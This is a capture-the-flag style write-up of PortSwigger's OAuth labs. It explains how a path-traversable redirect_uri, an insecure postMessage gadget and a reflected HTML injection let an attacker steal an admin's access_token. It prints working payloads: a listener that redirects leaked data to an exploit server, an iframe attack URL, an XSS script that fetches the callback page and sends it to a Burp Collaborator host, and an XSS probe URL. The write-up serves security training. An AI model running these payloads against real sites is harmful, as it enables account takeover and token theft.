Web Security Academy : Going deep on OAuth labs and a beautiful unintended solution

PortSwigger provides labs that are constantly updated, and I like to use them to improve my web hacking skills.

Recently they released a whole new set of labs on OAuth authentication. I solved each one, learned new things, and ended up with an interesting unintended solution for the "Expert" lab that I want to share back with the community.

This lab is a simple blogging system that allows users to log in with their social media account.

The admin will open every link you send, so we need to craft a one-click account takeover exploit to access the admin's API key.

The intended solution

After analyzing the social media authentication request, you will notice a redirect_uri parameter pointing to the OAuth callback URL. This is where the system redirects after confirming the authentication, appending the current session's access_token as a URL fragment in the client-side browser.


In some cases you can simply change the redirect_uri to point to your own server, leaking the access_token.


But not in this case..

There's a whitelist of redirect_uris, and the URL must include the substring:


Path traversal

The whitelist forces the redirect to stay on this host, but not on this path, because the check is vulnerable to a path traversal.


Will be interpreted as:


Knowing this, we can redirect the callback anywhere on this host. But where can we redirect to leak the access_token?
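To see why the traversal works, here's a quick sketch using the WHATWG URL parser (the host is a placeholder): the whitelist matches the raw redirect_uri string, but the browser and server resolve the ../ segments.

```javascript
// The raw string still contains the whitelisted substring, but after
// dot-segment normalization the request actually lands on a different
// path on the same host. (victim.example is a placeholder host.)
const crafted = new URL(
  'https://victim.example/oauth-callback/../post/comment/comment-form'
);
console.log(crafted.pathname); // "/post/comment/comment-form"
```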

Insecure web messaging scripts

After some enumeration I found insecure web messaging scripts that, when the page loads, send a postMessage with data = window.location.href to a parent listener, trusting the wildcard origin *.

Parent Post Message trigger trusting on *

Following the Post Message content, triggered on page load.

Post message Event Listener on a comment box.

This is a perfect gadget for us, because window.location.href includes the URL fragment, and the postMessage will propagate to every parent listener.
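Based on the behavior described above, the gadget looks roughly like this (a reconstruction, not the lab's exact source):

```html
<!-- Sketch of the web messaging script on the comment form page
     (reconstructed, not the lab's exact source). On load it posts the
     full URL, fragment included, to ANY parent, because the target
     origin is the wildcard "*". -->
<script>
  parent.postMessage({ type: 'onload', data: window.location.href }, '*');
</script>
```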

So, the main idea is:

  • Create a malicious web page with our own listener, forwarding the event data to an external server;
  • Include an IFRAME loading the callback with a path traversal redirect_uri of /oauth-callback/../post/comment/comment-form, where the postMessage trigger is stored;
  • The postMessage will be sent to our parent listener, and the listener will dump the event data to our external server using a JS location redirect.

My final payload

The expected payload to solve this lab.

window.addEventListener('message', function(e){  
  var myJSON = JSON.stringify(e.data);
  // dump the leaked event data (URL fragment included) to our external
  // server -- replace the host below with your own exploit server
  window.location = 'https://YOUR-EXPLOIT-SERVER/?leak=' + encodeURIComponent(myJSON);
});

<iframe id="aaaa" src="https://ac6d1f1f1e9462a380ec24ee02f500e3.web-security-academy.net/auth?client_id=pfx6adz3dqzlgebroh99o&redirect_uri=https://acd01fa21eb0624f806f2427008a0072.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=1679470272&scope=openid%20profile%20email" onload="this.contentWindow.postMessage('intrd','*')">  

Hosting this on a malicious web page and sending it to the user will leak the access_token.

And finally, with this Bearer session token, we can authenticate as the admin and extract their API key.

And submit the solution.

The unintended solution

Well, the original solution depends on these web messaging scripts.

What if there's no Web Message scripts?

So, if you enumerate this OpenID authentication server a little more, you will find the OpenID Connect configuration values at the provider's well-known configuration endpoint, per the specification (http://openid.net/specs/openid-connect-discovery-1_0.html#ProviderConfigurationRequest).

The /.well-known/openid-configuration endpoint will leak all OpenID endpoints and accepted parameters.
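A trimmed sketch of what that discovery document can contain (field names per the OpenID Connect Discovery spec; hosts and values here are illustrative):

```json
{
  "authorization_endpoint": "https://oauth-server.example/auth",
  "token_endpoint": "https://oauth-server.example/token",
  "response_types_supported": ["code", "token", "id_token token"],
  "response_modes_supported": ["query", "fragment", "form_post"]
}
```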

As we know, the default response_mode is fragment; it's not included in the request, but you can add the parameter explicitly and get the normal redirect callback + fragment response.

Now, following this OpenID configuration, I noticed that we are also allowed to set the form_post, fragment, and query modes.

And the form_post mode will return an HTML page with an auto-submit form that includes a hidden access_token input.
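Per the OAuth 2.0 Form Post Response Mode spec, that callback page looks roughly like this (values and hosts are placeholders):

```html
<!-- Sketch of a form_post callback response (placeholder values) -->
<body onload="document.forms[0].submit()">
  <form method="post" action="https://client.example/oauth-callback">
    <input type="hidden" name="access_token" value="ACCESS_TOKEN_HERE">
    <input type="hidden" name="token_type" value="Bearer">
  </form>
</body>
```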

You can also change the response_type to id_token token; it will return a full JWT, useful in some cases.
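A JWT is just base64url-encoded JSON segments, so reading the id_token claims is one decode away. A sketch with a made-up, unsigned token (not one issued by the lab):

```javascript
// Build a made-up unsigned JWT purely to demonstrate the decode step.
const claims = { sub: 'wiener', scope: 'openid profile email' };
const idToken =
  Buffer.from(JSON.stringify({ alg: 'none' })).toString('base64url') + '.' +
  Buffer.from(JSON.stringify(claims)).toString('base64url') + '.';

// Decoding: split on '.', base64url-decode the middle (payload) segment.
const payload = JSON.parse(
  Buffer.from(idToken.split('.')[1], 'base64url').toString('utf8')
);
console.log(payload.sub); // "wiener"
```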

HTML Injection

In the same way this endpoint is vulnerable to path traversal, it is also vulnerable to HTML injection.

I noticed that you can break out of the "> and reflect everything into the callback response page; there's no filtering.

With the following payload you are able to trigger a perfect reflected XSS, and it will be processed before the callback's auto-form post.
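A minimal breakout of the same shape (an assumption based on the "> context described above, not the exact lab payload) appended to the redirect_uri would look like:

```html
<!-- Hypothetical sketch: closes the reflected attribute and injects a
     script that runs before the auto-submit form fires -->
"><script>alert(document.domain)</script>
```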


Now we have an XSS executed directly on a page containing the access_token.

We just need to find a way to dump this page's content to an external server.

Trying to redirect the document.body.innerHTML to an external server

This is the simplest way to read page content from an XSS while bypassing CORS, and the first thing that came to my mind.
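A minimal sketch of that idea (the exfiltration host is a placeholder):

```html
<script>
  // Redirect the victim, carrying the current page body as a parameter;
  // a top-level navigation is not subject to CORS.
  window.location = 'https://attacker.example/?d='
    + encodeURIComponent(document.body.innerHTML);
</script>
```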


The redirect works: the XSS reads document.body.innerHTML, URI-encodes it, and sends it to an external server as a parameter.

But because of the synchronous nature of JavaScript, the page content breaks at the exact point where the script is executed, closing the </form> and ignoring the rest of the page, including the access_token input value.

Taking advantage of the callback auto-submit form to submit a dangling form input as a new comment

This one was cool, the main idea is:

  • Use the auto-submit form generated by the OpenID callback, pointing it at the path traversal /oauth-callback/../post/comment;
  • This will submit a new comment in the blog comment box;
  • And use a dangling <textarea> to read the rest of the page, including the access_token input, setting it as the comment input value.

Pay attention to that dangling <textarea> that never closes; it will send the rest of the form as the comment parameter.
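Sketched out, the injected markup looks something like this (reconstructed, not the exact lab payload; the csrf and postId values are placeholders):

```html
<!-- Reconstructed sketch. The redirect_uri path traversal points the
     provider's auto-submit form at /oauth-callback/../post/comment,
     and the HTML injection adds the inputs the comment endpoint
     expects (placeholder values): -->
"><input type="hidden" name="csrf" value="CSRF_TOKEN_HERE">
<input type="hidden" name="postId" value="1">
<textarea name="comment">
```

Because the `<textarea>` is never closed, everything after it in the callback page, including the hidden access_token input, is swallowed into the comment value when the form auto-submits.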

Crazy idea?

It works like a charm: the victim's access_token gets posted as a comment.

But there's a problem here: our payload has a hardcoded CSRF token, and the victim's (admin) session will have a different CSRF token, so we would need to leak that CSRF token first and then do the POST.

This sounds possible, but I found a better way.

Asynchronous fetching the entire callback page

We already control the client-side browsing, so why not force the client to do another callback redirect and then fetch the full response using the JavaScript Fetch API?


"><script>
const url = 'https://acdd1f011f7a275781d61e6c02b8005e.web-security-academy.net/auth?client_id=wt8e823bklnuhof8cekfj&redirect_uri=https://ac7b1fca1f9e271c81e31e7e00c30051.web-security-academy.net/oauth-callback&response_type=token&nonce=381190702&scope=openid%20profile%20email&response_mode=form_post';  
const intrd_collab = 'https://n6uuiwrk5slgrssutx5rgpuwtnzgn5.burpcollaborator.net';

const request = async () => {  
    // re-request the callback and capture the full response body
    const response = await fetch(url);
    const dump = await response.text();
    new Image().src = intrd_collab + '/?dump=' + encodeURIComponent(dump);
};
request();
</script><input type="hidden" name="xxx" value="  

The idea here is:

  • Change the OpenID response_mode to form_post, returning an auto-submit callback page;
  • Use the XSS to execute an async JS fetch of the response;
  • This will make a new GET request to the callback and store the full response in a variable;
  • URI-encode this variable as a parameter and create a new Image() whose src points to an external server.

This way you can read the entire callback page content, and the new Image() trick will bypass CORS.

Final Payload (unintended way)

Putting it all together.


When the authenticated victim clicks the malicious link...

The entire callback page, including the access_token, will be leaked to our controlled server as an encoded parameter.

And we can use the session token to retrieve the API key. :)

Bonus: Another XSS

The blog post endpoint /post?postId=9&uly0j'><script>alert(1)</script>aaaa=1 will also trigger the XSS, and I believe it can be used to find other ways to leak the access_token.